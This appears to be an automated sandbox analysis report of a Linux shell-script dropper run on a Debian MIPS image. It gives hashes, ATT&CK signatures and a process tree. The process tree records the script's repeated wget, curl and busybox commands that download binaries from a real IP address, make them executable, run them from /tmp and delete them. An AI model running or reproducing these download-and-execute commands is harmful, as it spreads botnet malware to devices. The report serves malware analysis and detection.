Analysis
-
max time kernel
88s -
max time network
91s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240729-en -
resource tags
arch:mipsel image:debian9-mipsel-20240729-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mipsel system -
submitted
25/11/2024, 03:07
Static task
static1
Behavioral task
behavioral1
Sample
e8edf9c2eda40f1e035b097be7b90505f3ff5a8c1c33aa3a5ddf8477b75b42be.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
e8edf9c2eda40f1e035b097be7b90505f3ff5a8c1c33aa3a5ddf8477b75b42be.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
e8edf9c2eda40f1e035b097be7b90505f3ff5a8c1c33aa3a5ddf8477b75b42be.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
e8edf9c2eda40f1e035b097be7b90505f3ff5a8c1c33aa3a5ddf8477b75b42be.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
e8edf9c2eda40f1e035b097be7b90505f3ff5a8c1c33aa3a5ddf8477b75b42be.sh
-
Size
10KB
-
MD5
00e6a838ebbbb8d44e8bde3072d71948
-
SHA1
18ba68e4dc8af71f08dc42dc68055a295059cee5
-
SHA256
e8edf9c2eda40f1e035b097be7b90505f3ff5a8c1c33aa3a5ddf8477b75b42be
-
SHA512
a8395ad7797c42c32a6f073151b82aea873fa6c842131b0899ee95e667e0038619feddfc236a5b12c834fb6a032f31a0cd79e3f931da05269dda866616ebdc14
-
SSDEEP
192:uTWqEbzElT+8s8V5fmlJRGmGxFNCiOn8s8V5alJRGm6xFNCi/WqEbzcq:unT+8s8V5fmlJRGmrn8s8V5alJRGmf
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 28 IoCs
-
description ioc Process
File opened for reading /proc/sys/crypto/fips_enabled curl
-
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process
883 rm
932 wget
934 busybox
937 rm
879 curl
880 busybox
882 YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP
878 wget
933 curl
936 YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP
-
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/e8edf9c2eda40f1e035b097be7b90505f3ff5a8c1c33aa3a5ddf8477b75b42be.sh/tmp/e8edf9c2eda40f1e035b097be7b90505f3ff5a8c1c33aa3a5ddf8477b75b42be.sh1⤵PID:711
-
/bin/rm/bin/rm bins.sh2⤵PID:716
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN2⤵PID:720
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:735
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN2⤵PID:740
-
-
/bin/chmodchmod 777 nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN2⤵
- File and Directory Permissions Modification
PID:743
-
-
/tmp/nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN./nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN2⤵
- Executes dropped EXE
PID:744
-
-
/bin/rmrm nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN2⤵PID:745
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T2⤵PID:746
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:747
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T2⤵PID:748
-
-
/bin/chmodchmod 777 0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T2⤵
- File and Directory Permissions Modification
PID:749
-
-
/tmp/0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T./0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T2⤵
- Executes dropped EXE
PID:750
-
-
/bin/rmrm 0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T2⤵PID:751
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK2⤵PID:752
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:753
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK2⤵PID:754
-
-
/bin/chmodchmod 777 PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK2⤵
- File and Directory Permissions Modification
PID:759
-
-
/tmp/PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK./PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK2⤵
- Executes dropped EXE
PID:760
-
-
/bin/rmrm PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK2⤵PID:763
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM2⤵PID:764
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:773
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM2⤵PID:782
-
-
/bin/chmodchmod 777 Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM2⤵
- File and Directory Permissions Modification
PID:787
-
-
/tmp/Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM./Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM2⤵
- Executes dropped EXE
PID:788
-
-
/bin/rmrm Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM2⤵PID:791
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk2⤵PID:793
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:805
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk2⤵PID:811
-
-
/bin/chmodchmod 777 tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk2⤵
- File and Directory Permissions Modification
PID:812
-
-
/tmp/tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk./tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk2⤵
- Executes dropped EXE
PID:813
-
-
/bin/rmrm tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk2⤵PID:814
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu2⤵PID:815
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:816
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu2⤵PID:817
-
-
/bin/chmodchmod 777 y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu2⤵
- File and Directory Permissions Modification
PID:818
-
-
/tmp/y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu./y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu2⤵
- Executes dropped EXE
PID:819
-
-
/bin/rmrm y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu2⤵PID:820
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL2⤵PID:822
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:830
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL2⤵PID:843
-
-
/bin/chmodchmod 777 hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL2⤵
- File and Directory Permissions Modification
PID:849
-
-
/tmp/hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL./hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL2⤵
- Executes dropped EXE
PID:851
-
-
/bin/rmrm hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL2⤵PID:854
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD2⤵PID:856
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:861
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD2⤵PID:862
-
-
/bin/chmodchmod 777 RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD2⤵
- File and Directory Permissions Modification
PID:863
-
-
/tmp/RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD./RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD2⤵
- Executes dropped EXE
PID:864
-
-
/bin/rmrm RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD2⤵PID:865
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV2⤵PID:866
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:867
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV2⤵PID:868
-
-
/bin/chmodchmod 777 OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV2⤵
- File and Directory Permissions Modification
PID:869
-
-
/tmp/OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV./OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV2⤵
- Executes dropped EXE
PID:870
-
-
/bin/rmrm OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV2⤵PID:871
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD2⤵PID:872
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:873
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD2⤵PID:874
-
-
/bin/chmodchmod 777 TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD2⤵
- File and Directory Permissions Modification
PID:875
-
-
/tmp/TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD./TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD2⤵
- Executes dropped EXE
PID:876
-
-
/bin/rmrm TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD2⤵PID:877
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP2⤵
- System Network Configuration Discovery
PID:878
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:879
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP2⤵
- System Network Configuration Discovery
PID:880
-
-
/bin/chmodchmod 777 YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP2⤵
- File and Directory Permissions Modification
PID:881
-
-
/tmp/YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP./YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:882
-
-
/bin/rmrm YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP2⤵
- System Network Configuration Discovery
PID:883
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE12⤵PID:884
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE12⤵
- Reads runtime system information
- Writes file to tmp directory
PID:885
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE12⤵PID:886
-
-
/bin/chmodchmod 777 JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE12⤵
- File and Directory Permissions Modification
PID:887
-
-
/tmp/JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE1./JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE12⤵
- Executes dropped EXE
PID:888
-
-
/bin/rmrm JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE12⤵PID:889
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik2⤵PID:890
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:891
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik2⤵PID:892
-
-
/bin/chmodchmod 777 Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik2⤵
- File and Directory Permissions Modification
PID:893
-
-
/tmp/Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik./Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik2⤵
- Executes dropped EXE
PID:894
-
-
/bin/rmrm Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik2⤵PID:895
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt2⤵PID:896
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:897
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt2⤵PID:898
-
-
/bin/chmodchmod 777 BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt2⤵
- File and Directory Permissions Modification
PID:899
-
-
/tmp/BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt./BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt2⤵
- Executes dropped EXE
PID:900
-
-
/bin/rmrm BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt2⤵PID:901
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu2⤵PID:902
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:903
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu2⤵PID:904
-
-
/bin/chmodchmod 777 y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu2⤵
- File and Directory Permissions Modification
PID:905
-
-
/tmp/y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu./y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu2⤵
- Executes dropped EXE
PID:906
-
-
/bin/rmrm y3YjUZsMaEyB1p2AyzpKnkNGIWj9zPQQQu2⤵PID:907
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL2⤵PID:908
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:909
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL2⤵PID:910
-
-
/bin/chmodchmod 777 hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL2⤵
- File and Directory Permissions Modification
PID:911
-
-
/tmp/hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL./hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL2⤵
- Executes dropped EXE
PID:912
-
-
/bin/rmrm hDnTG0Y48Qig5W9Zh21eLcBkfn8MTBIdOL2⤵PID:913
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD2⤵PID:914
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:915
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD2⤵PID:916
-
-
/bin/chmodchmod 777 RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD2⤵
- File and Directory Permissions Modification
PID:917
-
-
/tmp/RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD./RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD2⤵
- Executes dropped EXE
PID:918
-
-
/bin/rmrm RXpoibTDnBbVMLwf5HHlG1TxKmWgMbEXgD2⤵PID:919
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV2⤵PID:920
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:921
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV2⤵PID:922
-
-
/bin/chmodchmod 777 OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV2⤵
- File and Directory Permissions Modification
PID:923
-
-
/tmp/OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV./OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV2⤵
- Executes dropped EXE
PID:924
-
-
/bin/rmrm OLppiEqN7v3WONjbrIKanX9T7cDfCaGRfV2⤵PID:925
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD2⤵PID:926
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:927
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD2⤵PID:928
-
-
/bin/chmodchmod 777 TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD2⤵
- File and Directory Permissions Modification
PID:929
-
-
/tmp/TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD./TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD2⤵
- Executes dropped EXE
PID:930
-
-
/bin/rmrm TNNhAHbCtbnTcwPNrLKe6QzGHyWQcOCTCD2⤵PID:931
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP2⤵
- System Network Configuration Discovery
PID:932
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:933
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP2⤵
- System Network Configuration Discovery
PID:934
-
-
/bin/chmodchmod 777 YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP2⤵
- File and Directory Permissions Modification
PID:935
-
-
/tmp/YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP./YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:936
-
-
/bin/rmrm YgEFZrN7iPJ7Deg7IIlXwKTfmN64blewuP2⤵
- System Network Configuration Discovery
PID:937
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE12⤵PID:938
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE12⤵
- Reads runtime system information
- Writes file to tmp directory
PID:939
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE12⤵PID:940
-
-
/bin/chmodchmod 777 JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE12⤵
- File and Directory Permissions Modification
PID:941
-
-
/tmp/JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE1./JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE12⤵
- Executes dropped EXE
PID:942
-
-
/bin/rmrm JkB74PrqcV7HDNqSAOLVHOFa0lXuhDlCE12⤵PID:943
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik2⤵PID:944
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:945
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik2⤵PID:946
-
-
/bin/chmodchmod 777 Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik2⤵
- File and Directory Permissions Modification
PID:947
-
-
/tmp/Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik./Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik2⤵
- Executes dropped EXE
PID:948
-
-
/bin/rmrm Q1SfCIGzN502cuKfKuxKlfIbB5Wa81Hzik2⤵PID:949
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt2⤵PID:950
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:951
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt2⤵PID:952
-
-
/bin/chmodchmod 777 BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt2⤵
- File and Directory Permissions Modification
PID:953
-
-
/tmp/BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt./BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt2⤵
- Executes dropped EXE
PID:954
-
-
/bin/rmrm BcvMfI8RkjryiH3lp2wSrKvPq1lhtdCbUt2⤵PID:955
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN2⤵PID:956
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:957
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN2⤵PID:958
-
-
/bin/chmodchmod 777 nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN2⤵
- File and Directory Permissions Modification
PID:959
-
-
/tmp/nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN./nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN2⤵
- Executes dropped EXE
PID:960
-
-
/bin/rmrm nMs4BHUQ3Mpv68fm7PmA4AMDIumyGXabsN2⤵PID:961
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T2⤵PID:962
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:963
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T2⤵PID:964
-
-
/bin/chmodchmod 777 0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T2⤵
- File and Directory Permissions Modification
PID:965
-
-
/tmp/0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T./0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T2⤵
- Executes dropped EXE
PID:966
-
-
/bin/rmrm 0yPOrGwt4oDYLgegdQRzxG4OU3uqyD1I8T2⤵PID:967
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK2⤵PID:968
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:969
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK2⤵PID:970
-
-
/bin/chmodchmod 777 PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK2⤵
- File and Directory Permissions Modification
PID:971
-
-
/tmp/PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK./PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK2⤵
- Executes dropped EXE
PID:972
-
-
/bin/rmrm PUqN1KhYPNWYp8jwxhEPeo32oQYdC6nxkK2⤵PID:973
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM2⤵PID:974
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:975
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM2⤵PID:976
-
-
/bin/chmodchmod 777 Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM2⤵
- File and Directory Permissions Modification
PID:977
-
-
/tmp/Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM./Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM2⤵
- Executes dropped EXE
PID:978
-
-
/bin/rmrm Dji2a7WyZuK6gCmEdOZe3eD8fUwLJdUpCM2⤵PID:979
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk2⤵PID:980
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:981
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk2⤵PID:982
-
-
/bin/chmodchmod 777 tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk2⤵
- File and Directory Permissions Modification
PID:983
-
-
/tmp/tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk./tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk2⤵
- Executes dropped EXE
PID:984
-
-
/bin/rmrm tZ9F5PpspbqJBeSDuL5SsFEH5rQFLCiWkk2⤵PID:985
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97